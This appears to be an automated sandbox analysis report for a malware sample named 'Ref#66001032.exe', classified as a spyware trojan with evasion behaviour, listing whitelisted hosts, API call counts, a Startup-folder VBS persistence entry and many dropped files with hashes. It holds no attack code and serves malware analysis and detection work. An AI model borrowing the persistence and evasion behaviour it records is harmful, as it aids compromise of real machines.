Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ref#66001032.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@10/108@2/3
                                                        EGA Information:
                                                        • Successful, ratio: 66.7%
                                                        HCA Information:
                                                        • Successful, ratio: 91%
                                                        • Number of executed functions: 384
                                                        • Number of non-executed functions: 42
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.109.32.7, 184.28.90.27, 52.113.194.132, 20.42.65.89, 13.107.246.45, 20.109.210.53, 20.190.159.71
                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, osiprod-ukw-buff-azsc-000.ukwest.cloudapp.azure.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, ukw-azsc-000.roaming.officeapps.live.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, azureedge-t-prod.trafficmanager.net, onedscolprdeus11.eastus.cloudapp.azure.com, ecs.office.trafficmanager.n
                                                        • Execution Graph export aborted for target Length.exe, PID 1364 because it is empty
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
01:54:58  API Interceptor  3216648x Sleep call for process: Ref#66001032.exe modified
01:57:13  API Interceptor  15x Sleep call for process: InstallUtil.exe modified
01:57:22  API Interceptor  1650961x Sleep call for process: Length.exe modified
01:58:23  API Interceptor  389x Sleep call for process: splwow64.exe modified
07:57:12  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):118
                                                                                                Entropy (8bit):3.5700810731231707
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                MD5:573220372DA4ED487441611079B623CD
                                                                                                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                                                Process:C:\Users\user\Desktop\Ref#66001032.exe
                                                                                                File Type:Microsoft Excel 2007+
                                                                                                Category:dropped
                                                                                                Size (bytes):263638
                                                                                                Entropy (8bit):6.618663336984656
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:z0K7BgwHpRZAKDmeEyz27GIeiTKOq7rqpm9nrdM63/rmtVyf+i3dGZUpuhzWUYTN:z04Dfvz27Gl1qpm9rLSuRtlZ
                                                                                                MD5:F8C54480E819D1F6B150CC500447393F
                                                                                                SHA1:D0C36AF14EBD87343C147B618E4F6D8137996F96
                                                                                                SHA-256:47629DCCC78E703BE615AC7C67EBC4AF2B19D1F63C67362EEE820DC94814A268
                                                                                                SHA-512:96FACBEB01A38B9085255191AE0213A6CB28D213A1A92B444732123A441A742CC6CB5DCBE08643621191C941F8C5AF35DAA89C135A9DA870E859C689C5EA2ACE
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3873
                                                                                                Entropy (8bit):5.13205641560811
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:07vexwKUYp0i4nq+0Bhq2h7RnHi8VsU7H9/P26i0yFFVA4:xISCa6VB
                                                                                                MD5:0878AB38209E20D255F26F4386A1C7FB
                                                                                                SHA1:82BC6719BDCB81E9E5F0D2D03FD249FA7333E5B1
                                                                                                SHA-256:5029BDDBA6BB3C65E668CF8A99F0629375E6E1C0BC9819E1D04E992829D74A27
                                                                                                SHA-512:5D1495E146F99439722E07FB3F9350280089C15ACF33EB22A96CE3B7623D162EA78A93ADC69B926230E645C4FEC15A6FFEDF6125B8EB2BDB311FE9FBC7DECE10
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):168
                                                                                                Entropy (8bit):6.834136247119151
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:1lHKqjZsrNFx/Ftl2LAYMPhZ6ZJ3NjeIlCr4fqdCJ8/qpSsNkFk:iqjZsrNF5Fm3MZQZ5x18qqdCJRp+k
                                                                                                MD5:F5F6AE9A9BC26AABEC8192363FA2341E
                                                                                                SHA1:7E1797B28BE0224ED9E9B2CDD016FC9DA5983F17
                                                                                                SHA-256:C51D0DD8821F6686E865A5FD2A7BF09EE1FCA07B7AA99B2856DF5F2C54860643
                                                                                                SHA-512:3C22F1BE37A828C1A7170DF4EC7A00F61C8C2A7F73CD850D79C91278AB91580846B0E1A4CC09F47CE0B7CAE8D98B783A9F442E7809C459091FA55FA6224B67A3
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4237157105943106
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IMiGJDYCFPMmBSwqVnCOZT/ttfc5LA93UBjqvUnCA:IlsDBFnShVlT/ttGLGOjql
                                                                                                MD5:452335E3907F8C381F1DCC8A5659F9CF
                                                                                                SHA1:FB65E72217A2A3A21B65A1B206865C83A04084A5
                                                                                                SHA-256:9F2A59D783DAE8A932F35FC6B2266A67A3E9902047DBF0DF2B124E76D1EE8DD6
                                                                                                SHA-512:1A69D8EDB88101858463D12E0D118C95F2F7121248FD79DF88CBEFF811872CDEF9B224EE61E084B18FAF078F93661AA88CF7133B0EA6A983DE43AE9075BAFF9C
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4275618644404644
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IYYCSPMm27wqtnEe2ZTowl/tfcWaLAap3U+yfj4i9:IYBS87ht+TP/t4LBpcfjB9
                                                                                                MD5:C6A6EFE16235C1A0553619F5BC37348B
                                                                                                SHA1:3FE8D90FC25B39E4DE8069E0EA71236E6A03F51F
                                                                                                SHA-256:00C9E92856CAEBCEB16739BE6B820EA3F46FB18C2EF6960C80624FC64C38085D
                                                                                                SHA-512:F4BF69BB137E58A5855B682921E850B3DE33D57C964A04662B989258F657429935C9D073F5A857384982F4DD3CD9C593B9FBC6D4BC4DC2DF99479E6D047C6F6C
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4237157105943106
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IMGJDYCdPMmB7wqVnEOZToytfcWRLAal3U+pj4i9vS:IXDBdn7hVnThtHLBlHjB9
                                                                                                MD5:E1422B20684C08E1959AACB8797B732E
                                                                                                SHA1:ECA9AB731001E83B499412D896954BD64023D8DC
                                                                                                SHA-256:A0E16AACDA10C5314C8582966081E0813C217ACFA28654E5A09BAF1A81391703
                                                                                                SHA-512:E411E5B9E47742764555F1C30ED367D0D4D5C31BCB30299D55EADCB76C739ABE4C61DDC396F8F0250719175DB617BA430FF33E71EACB49B2C6DD7AB83F5E1149
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4275618644404644
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IXeJDYCdPMmB7wqVnEOZToytfcWRLAal3U+pj4i9v:I0DBdn7hVnThtHLBlHjB9
                                                                                                MD5:FE6027666B10B8309F47A240BA861C24
                                                                                                SHA1:7D06BED5F4D78B8207FB1C58D9A9945D892FF2AF
                                                                                                SHA-256:06348313712B5C317A52F54DE5E834072EB18DAE5BE7A1BE0D3B88D320EFD7C0
                                                                                                SHA-512:2A6E53F46CFA341BAE9F97EEC4787B1335646319F6981FBA61ADFB856794F4A896930A0F38C9B0E9225E89DDB3940B5C5C6E252C003268E9DC90B46257A96C3A
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4237157105943106
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IMGJDYCdPMmB7wqVnEOZToytfcWRLAal3U+pj4i9vC:IXDBdn7hVnThtHLBlHjB9
                                                                                                MD5:074FF54BC184D4BBA85E19D4E363F431
                                                                                                SHA1:E25DC949B4F29ACAC6BDCA70F788F57661C4272D
                                                                                                SHA-256:BDE4374F98677EA4E82E4F0594FED84B38318FD0DF79A88D495C1D4AD9900210
                                                                                                SHA-512:07E1A6134ABDC53672771CF8DFE4713661430BFD81E5A69CF1E95B10E5C7C9331EDEFE797014148342A833F38176F419220145A76FD8EBBE658C024B4F61801B
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4275618644404644
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IHeJDYCdPMmB7wqVnEOZToytfcWRLAal3U+pj4i9v:IkDBdn7hVnThtHLBlHjB9
                                                                                                MD5:6CBC30D91C215EF3F733971ED972499F
                                                                                                SHA1:25597B645CA5A730CD6040AEE7C8C80102E64E4A
                                                                                                SHA-256:77C4F612773366882C905B572AA2C76725C23A064303533F9BD15E9A3DDA787D
                                                                                                SHA-512:AEEF276B1906A924751D59A053261CD7320DCA0104A46C072961F460EA8B806C5F97C58A4DA342616BB01AD365A6C8F1011DFBDEE48E87E26DB0B064392D0C58
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):88
                                                                                                Entropy (8bit):1.1923912884493169
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:CllQlllnl/bwl/flm0l/:mGvl/UHl/
                                                                                                MD5:E2027D7BCD47B95A5B0A4B44AF2F9ABF
                                                                                                SHA1:D4C8A76FC206FBEC1DBF7211AC353F97B6C7DF9B
                                                                                                SHA-256:05AE6EEA68D171B03567AB66974BAFE9488AF7CBEBC29B839EF8574D4DAD72A9
                                                                                                SHA-512:9C184146766549E8C75C5948E7810629494A71CF4AF1CABC80D42FC2CEABE60EA191A35FCE921FFFC47A23969E5DCC165995F0D63D79A3AD10C1BBB48EB4DC66
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):88
                                                                                                Entropy (8bit):1.2151185611765896
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Cll9l/bwl/W0l/6lllfl:mvl/UFl/O
                                                                                                MD5:AA82803A7811B574AD48BC1387804347
                                                                                                SHA1:751612B5A90233F1ABE89C76B41ABAB4B9DB4C05
                                                                                                SHA-256:ACD44F1B5168A053D77CC0F9C00847EC17ECACDFBEDBED7FACE4578ED164B3E7
                                                                                                SHA-512:F5D823D977C43B59C1071CEE8C678A39E775BE9ABDDFB0F75A569A4C67F7380205CB2C5A494683AD795F2C82B8B6BB8A3391E2327096E33E7932D282AB41016F
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):88
                                                                                                Entropy (8bit):1.1923912884493169
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:CllQlllnl/bwl/flm0l/:mGvl/UHl/
                                                                                                MD5:E2027D7BCD47B95A5B0A4B44AF2F9ABF
                                                                                                SHA1:D4C8A76FC206FBEC1DBF7211AC353F97B6C7DF9B
                                                                                                SHA-256:05AE6EEA68D171B03567AB66974BAFE9488AF7CBEBC29B839EF8574D4DAD72A9
                                                                                                SHA-512:9C184146766549E8C75C5948E7810629494A71CF4AF1CABC80D42FC2CEABE60EA191A35FCE921FFFC47A23969E5DCC165995F0D63D79A3AD10C1BBB48EB4DC66
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):88
                                                                                                Entropy (8bit):1.2151185611765896
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Cll9l/bwl/W0l/6lllfl:mvl/UFl/O
                                                                                                MD5:AA82803A7811B574AD48BC1387804347
                                                                                                SHA1:751612B5A90233F1ABE89C76B41ABAB4B9DB4C05
                                                                                                SHA-256:ACD44F1B5168A053D77CC0F9C00847EC17ECACDFBEDBED7FACE4578ED164B3E7
                                                                                                SHA-512:F5D823D977C43B59C1071CEE8C678A39E775BE9ABDDFB0F75A569A4C67F7380205CB2C5A494683AD795F2C82B8B6BB8A3391E2327096E33E7932D282AB41016F
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):56
                                                                                                Entropy (8bit):0.6967690383301713
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:illVl2lll:J
                                                                                                MD5:15E78173F01C5B2926C78101DCD8D3E5
                                                                                                SHA1:9F05C32925F21E5ED26BA4AC251701851B580FDD
                                                                                                SHA-256:D222B4E16E77D5148E41E38985ABBE76544662E78884AA227D813D7001509AD9
                                                                                                SHA-512:57145E6A09155A976F89F6B2BCA6EC1B85EEAF3AFFAF63FAE1ABF133F46E1DBBEE40AA2AE201C66FDEF3C05E07676852660C591462ED941E89DA84560B95A447
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):56
                                                                                                Entropy (8bit):0.732483324044457
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:El/bX1l:El/
                                                                                                MD5:713EC13803098F56C6257C556C095B19
                                                                                                SHA1:B39BB9248929D446E636BCD1D5732679753DFBA3
                                                                                                SHA-256:3AA55497E40B1B2100858C297FCFBDB593869A00DB2F0A6DA59B1234D06E40FE
                                                                                                SHA-512:2DB726CB2EEAE0A20E6CF9D77D9E7762FF3D74C3EB7B6E6C2DBEB0701B450A9DC96314A9DB79E054CCF1DD193D5ED10ECFE0D0E8F9521C677EB5E324A7BBC773
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):80
                                                                                                Entropy (8bit):1.1915783978789778
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:LEl2lllnl/bwl/Plm/l:oCvl/U
                                                                                                MD5:86EEF82473CDF3908A7992030C949863
                                                                                                SHA1:C7DE91D4369B13F62346D6E95331A318AF6D86CE
                                                                                                SHA-256:DA4BBE4931263AF07206B0C2064DDBF8A4C93CAE1561442CB3302C433E210D8A
                                                                                                SHA-512:B41ECDD5BEF1E07987279BD84F4DFA583945AE412CB7441643B04C425D1FDFFEBFE23D9E7CBA36BB584752B08C6D507465176BC58AE742BA4FAD532846EA7E4D
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):80
                                                                                                Entropy (8bit):1.2165783978789777
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:LRl8l/bwl/W0l/Dl:tGl/UFl/
                                                                                                MD5:5346CEB0CFFF1598AEB2C702E656FA5E
                                                                                                SHA1:556E71E50313B0C5D787A7904D4BDA359974E5CE
                                                                                                SHA-256:9059B400ABCE3594C93EA10D447D77E3309DD5D9205FA5B921C27E0FE0D608A5
                                                                                                SHA-512:D89EBC9BFA28CD74F42E68BC15CF5D3304542B865180A3D5B33F7D4FB42B0E2646B90189C07C648D566818CB7A6C64ABCF3CECD32E72297372718853539F9775
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):3.728300500619369
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:Itl/HtmZl1qY/qfS7K0l6d0DQNa97S7UtmioJBFD6Olv/6PWcp/g/cTdoJ:IIlb/qMKcW0DQNawXjQO1/6lRW
                                                                                                MD5:C3E860CC5ED6B7141170415C695910DB
                                                                                                SHA1:678C26AA2F550939212B294DA4502BF14457AE0A
                                                                                                SHA-256:8DE30C3FCBB118F9A83CAC4B89B47F1908775611D31A43D0D542B15158F7A315
                                                                                                SHA-512:CA5E9B9C164B34AC18F07B5CB105ABEFE22BE01A182B25CC89E9BEA5987A2AAF124645211CF8BA2F5106088DFE7CB6DCFB886C6E2F47FD48755BCEAE7D5FC89D
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:DOS executable (block device driver)
                                                                                                Category:dropped
                                                                                                Size (bytes):2237
                                                                                                Entropy (8bit):1.9031342069738209
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:aW7FSZipg43qMcpIIzH6nHt10TcDe3aYX2wAenk:JsipgqqZ2iH6n70TcOLnk
                                                                                                MD5:CBAE72A2AB2ABD7087AEEE523C373822
                                                                                                SHA1:D359978D6AF5B786712D20E980B8CAC024EC98DB
                                                                                                SHA-256:16F9593E144E40539E8B901BA08BE2EC234BFFA93FEBD5F1496FFC4C11023FEA
                                                                                                SHA-512:F63E9510FD2C91923E57AC1BF83393E48EAF5EB7D152A34C5A0B3FDBAB02F39F228A9F19BA58D1A05A3F682C2217904E0585CAA8B6A198C97948942BEA0A7C29
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):0.47139332164824843
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:/lflflEl8l:i0
                                                                                                MD5:E50F66EAA990B18FE1096C68AF425EAC
                                                                                                SHA1:5B83037444A2B5D419734EEE0E0BA11BB9A93672
                                                                                                SHA-256:56999AD2BCB95DD48CD2BB800E462DA9A0CEEF40F784D4F70632137C23968A83
                                                                                                SHA-512:30163B5545FE60524D15606FB759D670B13292B5CA052EA96F14575A39CB437FF5A55C3FB6596A084FC215A0BE370DFDC4E4B07A8E5C98686DF6CD87F452E4F8
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):0.5456884388695526
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:/lCllll0l:wlK
                                                                                                MD5:FAF0BF043126327E6D85977CC53A3B8E
                                                                                                SHA1:3A583A7DA32A499D92CA8794D76590E34E02124E
                                                                                                SHA-256:7C64021047398A8DED4AFD6DBEACBACC9EBE2948C1AC715098193858DE1E56C9
                                                                                                SHA-512:53A22FC8F48BC0010E186032A653A6CC2C56651D791EB17DCB40C70E0D6436A314F9C0C1DC0BF4E2B852DC1B6F18665825558A8F2FDCEC4F7E543474D1EA41D0
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4237157105943106
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IM8bKH9l/cwl/c7l/8ul/Il/dl/1cl/bScl/9cl/La0:IWHfcwyJ8u+df0ucn0L
                                                                                                MD5:571520B8933266ACC5616F6EDE7AAA84
                                                                                                SHA1:E53EFA133197B6593130E83FA68CF86AE4E6C35E
                                                                                                SHA-256:ADC1DEA39C10E3C8E7333E22923C6F7082B4F34FE2397E89A2FC5DEA544F1E52
                                                                                                SHA-512:3691617EEE0B5150EC93DCEBF0BF8583EF95934D05B3ABDE6C6CC5DE6CC709F1B4496BD90A7CC3802C99AF2BAED3082ADB24349FE97CD730D69FC50F2C7CC1E0
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4275618644404644
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IIl/IUcl/Kol/c5l/cql/5cl/UHcl/XGl/c3t1l/c:IYIUcUoyzcqj0UHcNCc3t1y
                                                                                                MD5:5DA62D27FC5F495820AF47A4FEF51FA9
                                                                                                SHA1:4030CEA924DA363F981004FE5AEC324CDB0ED3D9
                                                                                                SHA-256:3652A6045C130892EC90FEBD53C35ED2616CD182AAFF79805B806E9DD935F2F0
                                                                                                SHA-512:8F5D008634B8C78DDAE6AC32938309275770789659AF20BB4468EDACBB67CCB32D8B16B6A920706C2A78EF3B963FFA3684CFD91014AC5FAFD6C6B6B656226D67
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4237157105943106
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IMEcl/8cl/c8l/ccl/ccl/8cl/c8l/ccl/ccl/8a:If08cyUccy08cyUccy08
                                                                                                MD5:CB3A01F78584573B69FBC4DC4AA17C62
                                                                                                SHA1:E6A371E72572D856467A444A7464B1C0B0A52621
                                                                                                SHA-256:609DF23B7486D091206A0C150E93D1F5E00AD0CDB4CF5D81BC65B57535D48EA2
                                                                                                SHA-512:49F6CFDD28625920EFC8B217AC52E0C0B808EDC33C9DFA7DE15DFFDC823B0859A79D464C1634D2677155230D153DB39B96ECE85D98F7E92887C09244B573C539
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4275618644404644
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:I8cl/8cl/c8l/ccl/ccl/8cl/c8l/ccl/ccl/8cl/:I808cyUccy08cyUccy08c
                                                                                                MD5:359677CFC849EF85E383AE298F89AEC7
                                                                                                SHA1:AFC22980B005AF44CEE75E0624E71DD76324168A
                                                                                                SHA-256:983AD0AFECC0DE93857A6B691757C12A410D9AFCD7F0C49470FDAD9A66FF1DA3
                                                                                                SHA-512:053C3037F127D13D555FA3F426BBA952F5FDB54501D138081F1BAC3CF20262F39657E9DD312DABAA86201B49116E824A91ADA6452B3FC81CF1BF58496C610166
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=492x0
                                                                                                Category:dropped
                                                                                                Size (bytes):256
                                                                                                Entropy (8bit):3.9263495708028957
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RlE1Lldtz4T/7Wk53gvyJI9aFmMhOh510PS6wj0qujt/n:bjTjW+3gvyJWWnhOhr3Hwquj1n
                                                                                                MD5:7510B601C57906C211DBF3E592F4A787
                                                                                                SHA1:543FBA4A73E18D4EE3F105584A24BFE7A16CF69D
                                                                                                SHA-256:7E2D121942AF0A439A82AE3E72B1A174F958E9FDA83EF24823DF9818A233C844
                                                                                                SHA-512:78C6405884F362B893CF85AD1A42C3D3D4857FFD1B27BA29D08473B09241224D0272D2BD20D3B8D249F914C46F9157837CC30D7F5F9D38C4585B0C580198117D
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377y, sparse, rows 1, columns 8, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):3459
                                                                                                Entropy (8bit):2.748266022452727
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:/4rdI5gxjUt037QYWR8NxW9wVYjrar7ey7Bmeb7jz8QSLes851nqceBphDh:CI5AC0DWsGdy7B/jIes0qLBTh
                                                                                                MD5:A5936F0CC5D99182DF8FEE49A58E780B
                                                                                                SHA1:23399CF6C95DB21AB274AD9D4B3368A2E750B4EE
                                                                                                SHA-256:B6A3DDB3FAC874D9B239856B8A4B4A9833503896B85D9159F0FBC4E9E06B2EDB
                                                                                                SHA-512:7EFD318AD3F50160DB30BDCDAB62E40DA9F68AC17816C627928219A9F685968AF9146F9F91EC447FAB91695817100AD178A217E65F6E734625B624BD32224E44
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=492x0
                                                                                                Category:dropped
                                                                                                Size (bytes):256
                                                                                                Entropy (8bit):3.9263495708028957
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RlE1Lldtz4T/7Wk53gvyJI9aFmMhOh510PS6wj0qujt/n:bjTjW+3gvyJWWnhOhr3Hwquj1n
                                                                                                MD5:7510B601C57906C211DBF3E592F4A787
                                                                                                SHA1:543FBA4A73E18D4EE3F105584A24BFE7A16CF69D
                                                                                                SHA-256:7E2D121942AF0A439A82AE3E72B1A174F958E9FDA83EF24823DF9818A233C844
                                                                                                SHA-512:78C6405884F362B893CF85AD1A42C3D3D4857FFD1B27BA29D08473B09241224D0272D2BD20D3B8D249F914C46F9157837CC30D7F5F9D38C4585B0C580198117D
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
